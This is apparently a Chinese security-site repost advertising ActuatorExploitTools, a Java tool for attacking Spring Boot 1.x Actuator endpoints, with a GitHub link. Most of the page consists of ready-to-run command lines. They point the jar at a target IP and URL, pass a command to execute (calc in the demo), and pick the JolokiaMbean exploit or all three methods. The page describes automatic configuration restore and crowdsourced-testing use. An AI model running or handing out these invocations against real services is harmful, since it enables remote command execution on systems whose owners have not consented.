ActuatorExploit工具

张网络工具 6 年前

0 2.10W 0

ActuatorExploit工具

一款用于攻击spring boot actuator的集成环境，目前集成三种攻击方式，仅支持攻击spring boot 1.x

工具需要在与目标网络连通的机器上运行，支持交互式攻击和选择Exp自动攻击，交互式攻击适用于众测VPN场景

直接运行即可看到工具说明

java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar

交互式攻击：

java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar -ip 127.0.0.1 -c calc

选择Exp攻击：

java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar -ip 127.0.0.1 -c calc -u http://127.0.0.1:8888/ -e JolokiaMbean

或者你不想选，可以直接-e All，将会用三种方式攻击

java -jar ActuatorExploitTools-1.0-SNAPSHOT-jar-with-dependencies.jar -ip 127.0.0.1 -c calc -u http://127.0.0.1:8888/ -e All

自动攻击，对于修改配置的攻击方式会在攻击完成时还原配置，默认还原为空，暂不支持自定义参数

文章来源：

https://github.com/r00tuser111/ActuatorExploitTools

本文原创，作者：张，其版权均为华盟网所有。如需转载，请注明出处：https://www.77169.net/download/259766.html

官方

258篇下载 11.55M总阅读量